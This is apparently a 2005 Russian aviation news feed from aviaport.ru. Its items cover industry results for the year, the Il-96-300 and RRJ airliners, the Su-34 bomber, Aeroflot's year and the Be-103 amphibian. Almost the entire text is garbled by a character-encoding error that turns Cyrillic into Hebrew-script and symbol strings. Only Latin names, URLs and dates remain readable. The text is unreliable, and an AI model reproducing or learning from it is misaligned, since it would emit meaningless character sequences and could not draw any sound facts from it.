טעמדט אגטאצטמםםמי מענאסכט ג 2005 ד. - Thu, 29 Dec 2005 16:31:00 +0300 - ‡אעםףגרווס מזטהאםטו נורוםטי גכאסעוי מ סףהבו נמססטיסךמדמ אגטאןנמלא ט סךאםהאכ גמךנףד חאןנועא םא ןמכוע סאלמדמ םמגמדמ מעוקוסעגוםםמדמ האכםולאדטסענאכםמדמ סאלמכועא ˆכ-96-300 - דכאגםו טעמדט אגטאצטמםםמי מענאסכט ג 2005 דמהף.נוהןמכמזטעוכםמ םא ןונגמל ‎עאןו ג € בףהףע גםוסום דמסףהאנסעגוםםו ןאךוע אךצטי €• "‘ףץמי", € "ˆכ‏רטם", € "’ףןמכוג", חאגמהא "‘מךמכ", מלסמלמכסךמדמ-םא-€לףנו אגטאצטמםםמדמ ןנמטחגמהסעגוםםמדמ מבתוהטםוםט, מגמסטבטנסךמדמ אגטאצטמםםמדמ ןנמטחגמהסעגוםםמדמ מבתוהטםוםט, "€גטא‎ךסןמנעא", א עאךזו ”טםאםסמגמי כטחטםדמגמי ךמלןאםטט ט ךמלןאםטט "ˆכ‏רטם ”טםאםס מ". א געמנמל ‎עאןו ך ךמנןמנאצטט ןמהךכ‏קטעס "ˆנךףע", ךמעמנמלף לםמדטו ןנמקאע כטהונסעגמ ג ךמנןמנאצטט. הםא טח סאלץ גונמעםץ ךאםהטהאעףנ םא עמ, קעמב גמחדכאגטע €, - טסןמכםטעוכםי הטנוךעמנ "ˆנךףעא" ‚אכונטי וחגונץםטי. ‚ 2005 דמהף ןנאגטעוכסעגמ ןכאםטנמגאכמ גסונוח חאםעס מבתוהטםוםטול נמססטיסךטץ אגטאצטמםםץ אךעטגמג. ‚ פוגנאכו ‚כאהטלטנ ףעטם נאסןמנהטכס ןמהדמעמגטע ןנמוךע ףךאחא ןמ מבתוהטםוםט‏ גסוץ אגטאסענמטעוכםץ חאגמהמג ג והטםף‏ ךמלןאםט‏. נוהןמכאדאכמס, קעמ ןנוחטהוםע ןמהןטרוע המךףלוםע ך 1 הוךאבנ. מ ג טעמדו מם םו עמכךמ םו בכ ןמהןטסאם, םמ ט המ סטץ ןמנ מסעאועס חאדאהךמי, םא ךאךטץ ףסכמגטץ בףהוע ןנמגמהטעס ךמםסמכטהאצט.מםסמכטהאצט נמססטיסךטץ גונעמכועםץ חאגמהמג ג 2005 דמהף סמסעמכאס. ‚ סמסעאג ץמכהטםדא םא באחו "במנמםןנמלא" גמרכט € "מסךמגסךטי גונעמכועםי חאגמה", € "“כאם-“הטםסךטי אגטאצטמםםי חאגמה", € "אחאםסךטי גונעמכועםי חאגמה", € "מסעגונעמכ", € "מסךמגסךטי לארטםמסענמטעוכםי חאגמה "‚ןונוה"", € "‘עףןטםסךמו לארטםמסענמטעוכםמו ןנמטחגמהסעגוםםמו ןנוהןנטעטו". מ ןנמצוסס מסעאגטכ במכרו גמןנמסמג, קול מעגועמג, ןנטחםא‏עס ‎ךסןונע. "ונוץמה םא מהםף אךצט‏ ןנמרוכ ךאך-עמ סךמלךאםםמ. וסםמ, ןמ ךאךמלף ןנטםצטןף בכ גבנאם ךמ‎פפטצטוםע מבלוםא, םאןנטלונ", - ןמהגמהטע טעמדט אםאכטעטך ˆ "וםוססאםס אןטעאכ" אנטםא €כוךסווםךמגא.בתוהטםוםטו אגטאךמלןאםטי בכמ ןנמגאכוםמ, מב ‎עמל ג ךמםצו הוךאבנ םאןמלםטכ לטםטסענ ענאםסןמנעא ˆדמנ ‹וגטעטם. ט מבתוהטםוםטו גמךנףד "נאסינ" (AiRUnion), םט נופמנלאצט "ףכךמגמ" ט "מססטט" ג ןמכםמי לונו ג 2005 דמהף םו חאגונרטכטס. וזהף עול ךמםסמכטהאצט - והטםסעגוםםי סןמסמב גזטע םא נםךו הכ נמססטיסךטץ אגטאךמלןאםטי ג ףסכמגטץ המנמדמדמ דמנ‏קודמ ט טחםמרוםםמי עוץםטךט.‡אעמ ג 2005 דמהף מססטט ףהאכמס ןנמגוסעט סאלי במכרמי אגטאךמסלטקוסךטי סאכמם חא גס‏ טסעמנט‏ - €‘-2005 ג ןמהלמסךמגםמל †ףךמגסךמל. ‘אכמם סמבנאכ ןנוהסעאגטעוכוי במכוו קול 600 ךמלןאםטי טח 40 סענאם.מ ‎עמלף ןמךאחאעוכ‏ €‘ ףזו למזםמ סנאגםטגאע ס ךנףןםוירטלט סאכמםאלט ג ‹ו-ףנזו (”נאםצט), ג „ףבאו (€), ”אנםבמנמ (‚וכטךמבנטעאםט).ו ןמכףקטכמס עמכךמ סהוכאע אגטאצטמםםף‏ נלאנךף גסולטנםמי. ‚ †ףךמגסךטי ןנטוץאכט עמכךמ ןנמטחגמהטעוכט, ךמעמנו בכט חאטםעונוסמגאם ג סמענףהםטקוסעגו ס מססטוי. ‚ טעמדו חא ןע הםוי אגטאסאכמםא ג †ףךמגסךמל בכט חאךכ‏קום ךמםענאךע םא מבשף‏ סףללף $4 לכנה, ףקטעגא ןנוהגאנטעוכםו סמדכארוםט. א אגטאסאכמםו ג „ףבאו ג םמבנו 2005 דמהא ךמםענאךע בכט חאךכ‏קום םא סףללף $25 לכנה. ˆ וסכט ג „ףבאו סמכטנמגאכט ג מסםמגםמל עאךטו לטנמגו דטדאםע, ךאך Airbus ט Boeing, עמ ג †ףךמגסךמל מםט בכט םוחאלועם: במכרו גסודמ ךמםענאךעמג חאךכ‏קטכא "ˆכ‏רטם פטםאםס" - ןנטבכטחטעוכםמ םא $1,6 לכנה. "ˆ גסו-עאךט עאךמדמ סטכםמדמ סאכמםא ןמ בטחםוס-סמסעאגכ‏שוי ושו םו בכמ", - חאלוקאוע אםאכטעטך –וםענא אםאכטחא סענאעודטי ט עוץםמכמדטי מםסעאםעטם אךטוםךמ.‹ועמל, סנאחף ןמסכו אגטאסאכמםא, גס‏ מענאסכ ןמענס סךאםהאכ ס חאןנועמל םא ןמכוע ˆכ-96-300.םוםט אםאכטעטךמג€םאכטעטךט, מןנמרוםםו "ƒאחועמי.Ru", םו סקטעא‏ע ףץמהשטי דמה ףהאקםל ןמ לםמדטל ןנטקטםאל."וע והטםמי ןמכטעטךט, ךאךטו סאלמכוע נאחנאבאעגאע, ךאךטו ןמההונזטגאע. ‚ טעמדו ןנמהףךעא םוע, א וסע עמכךמ ךמםךףנוםעםא במנבא, ךמעמנא לוראוע אגטאןנמלף. ‚מחלמזםמ, ג 2006 דמהף מע סכמג ןונויהףע ך הוכף", - סקטעאוע ˆכ אךאנמג טח "€םעאםע אןטעאכ"."†האכט במכרודמ, - ןמהעגונזהאוע אנטםא €כוךסווםךמגא טח "וםוססאםס אןטעאכא". - נטקול ‎עמ מזטהאםטו חאעםףכמס. ˆ ‎עמ ןנט עמל, קעמ ף מענאסכט במכרמי ןמעוםצטאכ"."נאךעטקוסךט ג מבכאסעט אגטאןנמלרכוםםמסעט םטקודמ סונוחםמדמ חא דמה םו ןנמטחמרכמ", - מעלוקאוע הטנוךעמנ ךמםסאכעטםדמגמי ךמלןאםטט Infomost מנטס באך."•מעוכמס ב במכרודמ, םמ ט נוחףכעאע מקוגטהם. ƒמסףהאנסעגמ ןמגונםףכמס ך אגטאןנמלף. ‚ ןמסעסמגועסךמו גנול ושו םטךמדהא סעמכךמ גםטלאםט םו בכמ םט ןמ הוםדאל, םט ןמ נאחכטקםל ןנמוךעאל ט ןכאםאל נאחגטעט", - ףגונום מםסעאםעטם אךטוםךמ טח –וםענא אםאכטחא סענאעודטי ט עוץםמכמדטי. נוחטהוםעסךטי סאלמכוע, א עאךזו ושו 12 כאיםונמג נמססטיסךטץ אגטאךמלןאםטי גסעאכט במכוו קול םא לוסצ. אך סעאכמ טחגוסעםמ ןמחהםוו, טלוםםמ אהלטםטסענאצט ןנוחטהוםעא ןונוסענאץמגאכאס ט ןמגכטכא םא נורוםטו מסענאםסםאהחמנא חאןנועטע ןמכוע ˆכ-96-300. עמ ןנמטחמרכמ ןמסכו עמדמ, ךאך ג םאקאכו אגדףסעא ‚כאהטלטנ ףעטם, םאץמהטגרטיס ס מפטצטאכםל גטחטעמל ג ”טםכםהטט, םו סלמד גכועוע טח א‎נמןמנעא ’ףנךף ט בכ גםףזהום ןונוסוסע םא חאןאסםמי סאלמכוע. “ כאיםונמג בכט גגכום םאנףרוםט עמנלמחםמי סטסעול.ע חאןנועא ןמסענאהאכט םוסךמכךמ נמססטיסךטץ אגטאךמלןאםטי, ג עמל קטסכו "€‎נמפכמע", "„מלמהוהמגסךטו אגטאכטםטט" ט "נאסםמנסךטו אגטאכטםטט". ‚סו מםט נאססלאענטגאכט גמחלמזםמסע טסךמג ך דמסףהאנסעגף טכט ך ןנמטחגמהטעוכל, םמ ג טעמדו מעךאחאכטס מע םאלונוםט גמחלוסעטע ןמעונט.‡אןנוע םא מהטם טח סאלץ םמגץ נמססטיסךטץ דנאזהאםסךטץ סאלמכועמג ג מקונוהםמי נאח ףהאנטכ ןמ ןנוסעטזף מעוקוסעגוםםמדמ אגטאןנמלא. ƒוםהטנוךעמנ ‚מנמםוזסךמדמ אךצטמםונםמדמ סאלמכועמסענמטעוכםמדמ מבשוסעגא, ןנמטחגמהטגרודמ הועאכט ך ˆכ-96, ‚קוסכאג ‘אכטךמג גםףזהום בכ ףיעט ג מעסעאגךף.מסכו סךאםהאכא ס ˆכ-96-300 ס םמגמי מסענמעמי סעאכ גמןנמס מ ןמרכטםאץ םא סאלמכוע חאנףבוזםמדמ ןנמטחגמהסעגא. „‘ ט עאלמזוםםי סבמנ גלוסעו סמסעאגכ‏ע 40% צום סאלמכועא. מ ‎עמע גמןנמס המ ךמםצא דמהא עאךזו םו בכ נורום.‡א נףבוזמל 2005 דמה חאןמלםטעס ןנוזהו גסודמ דמםךמי Airbus ט Boeing ג מבכאסעט האכםולאדטסענאכםץ סאלמכועמג. Airbus ןנוהכאדאוע A350 - ‎ךמםמלטקםי כאיםונ, םמ מם סמגונרטע ןונגי ןמכוע עמכךמ ך 2010 דמהף. Boeing מבושאוע ך ‎עמלף גנולוםט ףזו םאקאע ןנמהאגאע B787 - Dreamliner. מנבא טהוע ט ןמ םאטבמכוו גלוסעטעוכםל סאלמכועאל - A380 ט Boeing 777-200LR Worldliner. ונגי ג 2005 דמהף ןנמרוכ טסןעאעוכםו ןמכוע ט סאלמסעמעוכםמ ןנטכועוכ ג „ףבאי. ‚עמנמי 10 םמבנ ףסעאםמגטכ נוךמנה ןמ האכםמסעט ןמכועא ןאססאזטנסךמדמ סאלמכועא בוח המחאןנאגךט, ןונוכועוג טח ƒמםךמםדא ג ‹מםהמם. ‚ מססטט אגטאךמלןאםטט ןמךא םו נורא‏עס םא גבמנ לוזהף דטדאםעאלט לטנמגמדמ אגטאסענמטעוכסעגא. מ האםםל, ןמגטגרטלס ג ךמםצו הוךאבנ, "€‎נמפכמע" בכטזו ך גבמנף Boeing 787, םוזוכט A350.„נףדטל חםאקטלל הכ מענאסכט סמבעטול סעאכמ עמ, קעמ ג םאקאכו הוךאבנ בכ ןמהןטסאם ןונגי ךנףןםי ךמםענאךע םא RRJ - נמססטיסךטי נודטמםאכםי סאלמכוע, נאחנאבאעגאולי €• "‘ףץמי" ט ןמכףקטגרטי ןמההונזךף דמסףהאנסעגא. "€‎נמפכמע" סמדכאסטכס ךףןטע 30 בכטזםולאדטסענאכםץ סאלמכועמג ןנמטחגמהסעגא "‘ףץמדמ" קונוח ”טםאםסמגף‏ כטחטםדמגף‏ ךמלןאםט‏. נאגהא, ט חהוס מבמרכמס םו בוח סךאםהאכא: הוןףעאע ƒמסהףל €כוךסאםהנ ‹ובוהוג, ךמםענמכטנף‏שטי מךמכמ 30% אךצטי "€‎נמפכמעא" קונוח אצטמםאכםף‏ נוחונגםף‏ ךמנןמנאצט‏, ןממבושאכ גסולט גמחלמזםלט סןמסמבאלט חאבכמךטנמגאע סהוכךף ג טםעונוסאץ הנףדמדמ בכטזםולאדטסענאכםמדמ סאלמכועא - €ם-148 מע "€םעמםמגא".עמע זו סאלמכוע ןמםנאגטכס ט נףךמגמהטעוכ‏ הנףדמי נמססטיסךמי אגטאךמלןאםטט - "נאסינ". ’אל ןמסקטעאכט, קעמ ףזו ןמסענמוםםי סאלמכוע כףקרו םוןמסענמוםםמדמ, ט ןנוהןמקכט ךףןטע הוסע €ם-148 ט ןמךא גמחהונזאעס מע RRJ. מ דמסףהאנסעגמ סםמ האכמ ןמםע, ךאךמדמ טח ןנועוםהוםעמג מםמ ןמההונזטגאוע. ‚ ךמםצו הוךאבנ טסעמקםטךט ג מסטלףשוסעגו, מסםמגםמל אךצטמםונו "נאסינ", האכט ןמםע, קעמ פוהונאכםמו אדוםעסעגמ חאבכמךטנףוע סהוכךף. - - - - - מגמסטבטנסךמו אגטאסענמוםטו: סמגנולוםםא מססט ט וו םובוסםי חאשטעםטך נמהטכטס ןמה מהםמי חגוחהמי - http://www.aviaport.ru/news/2005/12/29/99256.html - ‚ הוךאבנו 1993 ד. ןונגי ןמכוע סמגונרטכ פנמםעמגמי במלבאנהטנמגשטך קועגונעמדמ ןמךמכוםט ‘ף-34. ב ‎עמל ט הנףדטץ סמבעטץ נאססךאחגאוע דוםהטנוךעמנ € טל. ‚.. —ךאכמגא €. מבנרוג - Thu, 29 Dec 2005 16:27:00 +0300 - ‚ האכוךמל הוךאבנו 1993 דמהא סמגןאכט הגא סמבעט: םא ןמכטעטקוסךמי ךאנעו לטנא ןמגטכאס םמגא סףגונוםםא סענאםא ןמה םאחגאםטול מססט, א גםףענט וו, ג סעמכטצו ‘טבטנט, ס כועםמדמ ןמכ חאגמהא טל. ‚.. —ךאכמגא גחלכ ג ןונגי סגמי ןמכוע עמכךמ קעמ סמבנאםםי פנמםעמגמי במלבאנהטנמגשטך קועגונעמדמ ןמךמכוםט ‘ף-34. ƒמסףהאנסעגמ ט מהטם טח סאלץ דנמחםץ חא גס‏ טסעמנט‏ גמוםםמי אגטאצטט סאלמכועמג נמהטכטס מהםמגנולוםםמ, ןמה מהםמי חגוחהמי. אך בףהעמ מד בכאדמסכמגטכ מססט‏, האנמגאג ג למלוםע וו נמזהוםט םובוסםמדמ חאשטעםטךא, ךמעמני בףהוע נאחגטגאעס ט נאסעט גלוסעו סמ סענאםמי.ב ‎עמל ט מ הנףדטץ חםאלוםאעוכםץ סמבעטץ נמססטיסךמי טסעמנטט נאססךאחגאוע טץ םוןמסנוהסעגוםםי ףקאסעםטך, דוםונאכםי הטנוךעמנ מגמסטבטנסךמדמ אגטאסענמטעוכםמדמ ןנמטחגמהסעגוםםמדמ מבתוהטםוםט טל. ‚.. —ךאכמגא €כוךסאםהנ מבנרוג.- ƒכאגםל סמבעטול הכ נאבמעםטךמג € טל. ‚.. —ךאכמגא ג ףץמהשול דמהף סעאכמ המכדמזהאםםמו גךכ‏קוםטו םארודמ םמגמדמ סאלמכועא ‘ף-34 ג דמסףהאנסעגוםםי חאךאח. עמ חםאקטע, קעמ, םאקטםא ס םמגמדמ 2006 דמהא, חאגמה סםמגא בףהוע ןנמטחגמהטע סונטיםף‏ במוגף‏ עוץםטךף. נטקול מבתול ןנמטחגמהסעגא דמה מע דמהא בףהףע נאסעט. 12 כוע ןנטבכטזאכט ‎עמע הום, ןמסכוהמגאעוכםמ "סםמסטג" םא כועםץ טסןעאעוכםץ ןמכועאץ גמסול מןעםץ מבנאחצמג ‘ף-34. אבמע ןמ סמגונרוםסעגמגאםט‏ סאלמכועא םו מסעאםאגכטגאכטס האזו ג סאלו סכמזםו הכ חאגמהא גנולוםא, ךמדהא גסו ןנמטחגמהסעגמ חאלטנאכמ ט םו בכמ סנוהסעג םט םא חאנןכאעף, םט םא ‎כוךענמ‎םונדט‏. ו עמכךמ ‎ךמםמלטקוסךטו םוגחדמה ענובמגאכט מע ךמככוךעטגא € טל. ‚. . —ךאכמגא למבטכטחאצטט גסוץ סטכ - ג נףךמגמהסעגו סענאם םו בכמ והטםמדמ לםוםט מ סףהבו ‎עמדמ ןנמוךעא. ‚מ גסךמל סכףקאו, המ ךמםצא 90-ץ םטךעמ םו למד סךאחאע מןנוהוכוםםמ, קעמ ‘ף-34 בףהוע גךכ‏קום ג ןכאם ןונוגממנףזוםט ‚‚‘, ט םאל מסעאגאכמס עמכךמ מהםמ: גונטע ג םארו הועטשו. ףןמנםמ ןנמהמכזאכט נאבמעאע ט ןמבוהטכט. 13 אגדףסעא 2005 דמהא לטםטסענ מבמנמם ןנטםכ נורוםטו גךכ‏קטע ‘ף-34 ג דמסףהאנסעגוםםי חאךאח, עול סאלל ןמהגוה טעמדמגף‏ קונעף ןמה נוחףכעאעאלט גסוץ טסןעאםטי - ט לארטם, ט כ‏הויֹ‚עמנל ןמ חםאקטלמסעט סמבעטול ףץמהשודמ דמהא ב םאחגאכ סמחהאםטו מגמסטבטנסךמדמ פטכטאכא ‡€ "ƒנאזהאםסךטו סאלמכוע ‘ףץמדמ", ךמעמנמו מחםאלוםמגאכמ סמבמי ‏נטהטקוסךמו מפמנלכוםטו ןכאםמג סענמטעוכסעגא םמגוירודמ דנאזהאםסךמדמ סאלמכועא RRJ ("ארם ודטמם „זוע" - ףססךטי ודטמםאכםי ‘אלמכוע). עמע ןנמוךע ןנטחגאם ןמההונזאע סעאעףס םארוי סענאם ג דנאזהאםסךמל סאלמכועמסענמוםטט. א םארול ןנוהןנטעטט ג ךממןונאצטט ס אגטאסענמטעוכלט טח מלסמלמכסךא-םא-€לףנו בףהוע ןנמטחגמהטעס 95-לוסעםי גאנטאםע סאלמכועא. עאךזו בףהול ףקאסעגמגאע ג סמחהאםטט 60- ט 75-לוסעםץ לארטם.אססאזטנסךטי כאיםונ - הוכמ הכ € טל. ‚.. —ךאכמגא םמגמו ט ןמ‎עמלף מעגועסעגוםםמו: ענףהמגמלף ךמככוךעטגף ןנוהסעמטע מסגמטע םמגו עוץםמכמדטט ט פאךעטקוסךט ןונויעט םא םמגי ףנמגום ןנמטחגמהסעגא. “זו םאקאכאס נוךמםסענףךצט סבמנמקםמדמ צוץא, סמחהאםמ םמגמו ןמהנאחהוכוםטו גסמךמסךמנמסעםמי מבנאבמעךט לועאככא, גםוהנ‏עס הנףדטו עוץםמכמדטקוסךטו םמגרוסעגא. ˆעמדמל גסולף המכזום סעאע 2007 דמה, ךמדהא ןכאםטנףועס םאקאע כועםו טסןעאםט ןונגץ מבנאחצמג RRJ.מגי סאלמכוע ףזו מזטהא‏ע ג נמססטיסךטץ אגטאצטמםםץ ךמלןאםטץ, ךמעמנו ףזו גנאזא‏ע דמעמגםמסע ןנטמבנוסעט םוסךמכךמ הוסעךמג טחהוכטי. כאםטנףועס עאךזו ןנמהאזא םא ‎ךסןמנע: RRJ סןנמוךעטנמגאם ךאך סמגנולוםםי "וגנמןווצ", מעגוקא‏שטי גסול לוזהףםאנמהםל סעאםהאנעאל ט ענובמגאםטל. נמלו סונטיםמדמ ןנמטחגמהסעגא םמגוירודמ ‘ף-34 ט חאגונרוםט ןמהדמעמגךט ןנמטחגמהסעגא סאלמכועא RRJ, םארו ןנוהןנטעטו ג בףהףשול דמהף זהףע םאנאסעא‏שטו מבתול למהונםטחאצטט סאלמכועא ‘ף-24. ‚וה מגמסטבטנסך בכ והטםסעגוםםמי ןנמטחגמהסעגוםםמי ןכמשאהךמי, מעךףהא גץמהטכט ‎עט ןנוךנאסםו לארטם גןכמע המ 1993 דמהא. ‘ויקאס טץ ןמקעט עסקא ןמ גסולף לטנף, ט גסו מםט םףזהא‏עס ג למהונםטחאצטט, ךמעמנא סןמסמבםא חאלועםמ ןנומבנאחטע טץ במוגו ץאנאךעונטסעטךט. ’אך קעמ ןמעמך חאגמך םא למהונםטחאצט‏ םארטץ ךנכאעץ ןטעמלצוג, סךמנוו גסודמ, בףהוע םאנאסעאע.הםטל טח םאןנאגכוםטי הועוכםמסעט םארודמ חאגמהא, מ ךמעמנמל םוכח םו ףןמלםףע, בףהוע €ם-38. „מסעאגרטיס םאל ג םאסכוהסעגמ מע הכטעוכםמדמ ט ןכמהמעגמנםמדמ סמענףהםטקוסעגא ס €םעמםמגא (םםו חאנףבוזםמדמ), ‎עמע םובמכרמי דנףחמןאססאזטנסךטי סאלמכוע המךאחאכ סגמו ןנאגמ םא זטחם. ‚מ גסךמל סכףקאו, המסעאעמקםמ ףסעמיקטגי סןנמס םא םודמ הולמםסענטנף‏ע סענאם דמ-‚מסעמקםמי €חטט, דהו םארא םוןנטץמעכטגא לארטםא מךאחאכאס גןמכםו ןנטולכולמי הכ לוסעםץ אגטאכטםטי. בףהול ןנמהמכזאע סמגונרוםסעגמגאע ‎עמע סאלמכוע, בףהףקט ףגונוםםלט, קעמ מם ןמענובףועס ט ג םארול עוקוסעגו.מםוקםמ זו, גסו המסעטזוםט ט גסו ןכאם םא בףהףשוו € טל. ‚. . —ךאכמגא סמןנזום ס םארטל ךמככוךעטגמל, גועונאםאלט ט םמגלט ןמךמכוםטלט חאגמהקאם. ˆל סענמטע בףהףשטו סאלמכוע. מ‎עמלף ל בףהול ןנמהמכזאע םאנאשטגאע ףסטכט ןמ סמצטאכםמי חאשטעו םארטץ נאבמעםטךמג. ‚ םמבנו גנמסכא חאנןכאעא ף נאבמקטץ. ‚ בכטזאירוו גנול זהוע ןמגרוםטו גמחםאדנאזהוםט הכ הנףדטץ ךאעודמנטי נאבמעםטךמג מבתוהטםוםט. מ לונו ‎ךמםמלטקוסךמדמ ףךנוןכוםט ןנוהןנטעט, ל םאלונום גונםףע גוס מבתול סמצטאכםץ דאנאםעטי הכ נאבמעםטךמג € טל. ‚.. —ךאכמגא.‘ודמהם, ןמהגמה טעמדט ףץמהשודמ דמהא, למזםמ סךאחאע: חאהאקט, ךמעמנו ל סעאגטכט ןונוה סמבמי, גןמכםום ט ג ןנמטחגמהסעגוםםמל םאןנאגכוםטט, ט ג נורוםטט סמצטאכםץ ןנמבכול םא ןנוהןנטעטט. נט ‎עמל םומבץמהטלמ ןמהקונךםףע, קעמ סעמשטו ןונוה ךמככוךעטגמל קךאכמגצוג חאהאקט םא 2006 דמה ןמ סגמולף ףנמגם‏, םאןנזוםםמסעט, מבתולף במכוו סכמזםו, קול נורוםםו ג עוקוםטו 2005 דמהא. מ ףגונום: םארולף ךמככוךעטגף מםט ןמ ןכוקף, ל סןנאגטלס סמ גסולט ענףהםמסעלט ט ןנמבכולאלט! ‚ ךאםףם םמגמדמהםטץ ןנאחהםטךמג סונהוקםמ ןמחהנאגכ‏ גסוץ קךאכמגצוג ט זטעוכוי מגמסטבטנסךא ס מגל דמהמל. ע גסוי הףרט זוכא‏ ךנוןךמדמ חהמנמג, מןעטלטחלא, םוטססךאולמי ‎םונדטט ט גסקוסךטץ בכאד. —טסעמדמ םובא, כ‏בגט ט ףהאקט! - - - - - נמפסמ‏חםי ךמלטעוע ‡€ "€גטאסעאנ-‘" ןמחאבמעטכס מ םמגמדמהםטץ ןמהאנךאץ ךמככוךעטגף - http://www.aviaport.ru/news/2005/12/29/99255.html - אסשוםםף‏ ןנמדנאללף םמגמדמהםטץ ןנאחהםטךמג ןמהדמעמגטכ הכ ףכםמגסךטץ אגטאסענמטעוכוי ןנמפסמ‏חםי ךמלטעוע ‡€ "€גטאסעאנ-‘" - Thu, 29 Dec 2005 16:10:00 +0300 - אסשוםםף‏ ןנמדנאללף םמגמדמהםטץ ןנאחהםטךמג ןמהדמעמגטכ הכ ףכםמגסךטץ אגטאסענמטעוכוי ןנמפסמ‏חםי ךמלטעוע ‡€ "€גטאסעאנ-‘". ‘טכאלט למכמהוזםמדמ ךמלטעועא ןנמפךמלא ןנמגוהום במכרמי ןנאחהםטקםי ךמםצונע. נמפסמ‏חםו מנדאםטחאעמנ ןמבגאכט המלא ף ןוםסטמםונמג - גועונאםמג חאגמהא, טםגאכטהמג ענףהא. „כ הועוי אגטאסענמטעוכוי מנדאםטחמגאם נךטו ןנוהסעאגכוםט ף םמגמדמהםוי וכךט. 70 םמגמדמהםטץ ןמהאנךמג בכמ ןונוהאםמ נובעאל —ונהאךכטםסךמדמ הועסךמדמ המלא, רופמל ךמעמנמדמ ‡€ "€גטאסעאנ-‘" גכועס ףזו לםמדמ כוע. ‚סודמ הכ הועוי נאבמעםטךמג חאגמהא ט קכוםמג ןנמפסמ‏חםמדמ ךמלטעועא ןמהדמעמגכוםמ במכוו 6000 ןמהאנךמג. - - - - - €‎נמפכמע ג 2005 דמהף - http://www.aviaport.ru/news/2005/12/29/99254.html - „וןאנעאלוםע מבשוסעגוםםץ סגחוי € "€‎נמפכמע" ןנוהסעאגכוע סןטסמך סאלץ חםאקטלץ סמבעטי ג זטחםט ךמלןאםטט ג 2005 ד. - Thu, 29 Dec 2005 15:27:00 +0300 - ‚ ךאםףם םמגמדמהםטץ ןנאחהםטךמג „וןאנעאלוםע מבשוסעגוםםץ סגחוי ןמהגמהטע טעמדט דמהא ט ןנוהסעאגכוע סןטסמך סאלץ חםאקטלץ סמבעטי ג זטחםט ךמלןאםטט ג 2005 דמהף.םגאנ - אגטאךמלןאםט המסעטדכא ףנמגם בוחמןאסםמסעט ןמכועמג 99,95%, קעמ גץמהטע ג סנוהםטי הטאןאחמם ןמ ךכאססטפטךאצטט ICAO (99,90 - 99,98%).”וגנאכ - אגטאךמלןאםט "€‎נמפכמע - נמססטיסךטו אגטאכטםטט" ט €ססמצטאצט ראץלאעםץ פוהונאצטי סמגלוסעםמ ס מלטעועמל ןמ עףנטחלף נאגטעוכסעגא מסךג ןנמגוכט ראץלאעםי עףנםטנ "Aeroflot Open 2005" ס ןנטחמגל פמםהמל ג 175 עסק המככאנמג.אנע - €‎נמפכמע מסףשוסעגטכ ןונוץמה םא אגעמלאעטחטנמגאםםף‏ סטסעולף בנמםטנמגאםט ט ןנמהאזט בטכועמג ‘ויבנ.€ןנוכ - אגטאךמלןאםט סעאכא כאףנואעמל םאצטמםאכםמי ןנולטט "‡מכמעא לאסךא - 2005" ג ןמקועםמי םמלטםאצטט "‡א ןמההונזךף עואענאכםמדמ טסךףססעגא מססטט".אי - אךצט €‎נמפכמעא "בטכוי ‚וכטךמי מבוה", ג נאלךאץ ךמעמנמי בוסןכאעםלט בטכועאלט הכ ןונוכועא ג דמנמהא מססטיסךמי ”והונאצטט, ג סענאם ‡אןאהםמי …גנמן, ‘ƒ ט אכעטט גמסןמכחמגאכטס במכוו ןעט ס ןמכמגטםמי עסק גועונאםמג - פנמםעמגטךמג, בגרטץ ףחםטךמג פארטחלא, בכמךאהםטךמג ‹וםטםדנאהא.ˆ‏ם - מןנוהוכום דוםונאכםי ןמהנהקטך (פטנלא "Enka") ט םאקאעמ סענמטעוכסעגמ עונלטםאכא ˜ונולועוגמ-3.ˆ‏כ - €‎נמפכמע סעאכ ןמבוהטעוכול ןונגמדמ גסונמססטיסךמדמ ךמםךףנסא "‹ףקרא נמססטיסךא ךאהנמגא סכףזבא 2005 דמהא".€גדףסע - מסעאםמגכום ןאנך ˆכ-96, קעמ ןמענובמגאכמ מןונאעטגםמדמ לאםוגנא פכמעמל, סנמקםמי מןעטלטחאצטט לאנרנףעםמי סועט, ןנטגכוקוםט ‚‘ הנףדטץ אגטאךמלןאםטי. וסלמענ םא סכמזםמסע סטעףאצטט ט ףבעךט גסו מבחאעוכסעגא ןונוה ןאססאזטנאלט ט ךכטוםעאלט גןמכםום.‘וםעבנ - €‎נמפכמע ןמההונזאכ גסעאגךף "מססט!", ךמעמנף‏ ןמ סכףקא‏ 60-כועט מעךנכ ג ‏-‰מנךו ןנוחטהוםע ” ‚כאהטלטנ ףעטם.ךעבנ - €‎נמפכמע ףסןורםמ ןנמרוכ אףהטעמנסךף‏ ןנמגונךף םא סממעגועסעגטו סעאםהאנעאל ‎ךסןכףאעאצטמםםמי בוחמןאסםמסעט IATA-IOSA.מבנ - בנטדאהא במנעןנמגמהםטךמג €‎נמפכמעא ןנטםכא נמה םא במנעף סאלמכועא, סכוהמגאגרודמ טח מסךג ג ‹מס-€םהזוכוס.„וךאבנ - חאגונרום עוםהונ ט ןמהןטסאם ךמםענאךע םא ןמסעאגךף €‎נמפכמעף 30 סאלמכועמג RRJ.€ "€‎נמפכמע - נמססטיסךטו אגטאכטםטט" (’‘: AFLT) - ךנףןםוירא נמססטיסךא אגטאךמלןאםט. 51% אךצטי ןנטםאהכוזטע דמסףהאנסעגף. סםמגאםא ג 1923 דמהף. מםענמכטנףוע ןמנהךא 11% גםףענוםםודמ ט 39% לוזהףםאנמהםמדמ נםךא אגטאןונוגמחמך מססטט. —טסעא ןנטבכ חא 2004 ד. סמסעאגטכא 6330,143 לכם נףבכוי (219 לכם ‎ךג. המככ. ‘˜€). ‚ץמהטע ג סןטסמך 25 גוהףשטץ אגטאךמלןאםטי לטנא ןמ פטםאםסמגל ןמךאחאעוכל (ןמ גונסטט ATW). ‚ 2004 דמהף €‎נמפכמע ןונוגוח 6,862 לכם ןאססאזטנמג. אנך סמסעמטע טח 90 סאלמכועמג. אחטנףועס ג מסךגו, א‎נמןמנע ˜ונולועוגמ. כאםטנףוע ך 2007 דמהף ןמסענמטע סמבסעגוםםי עונלטםאכ "˜ונולועוגמ-3". - - - - - ‘אלמכוע-אלפטבט ו-103 ןנמטחגמהסעגא ’€’ טל. ƒ.. ונטוגא ןמכףקטכ ךטעאיסךטי סונעטפטךאע - http://www.aviaport.ru/news/2005/12/29/99253.html - “ןנאגכוםטו דנאזהאםסךמי אגטאצטט טעא חאגונרטכמ ןנמצוסס סונעטפטךאצטט כודךמדמ לםמדמצוכוגמדמ סאלמכועא-אלפטבטט ו-103 - Thu, 29 Dec 2005 15:22:00 +0300 - “ןנאגכוםטו דנאזהאםסךמי אגטאצטט טעא (CAAC) חאגונרטכמ ןנמצוסס סונעטפטךאצטט כודךמדמ לםמדמצוכוגמדמ 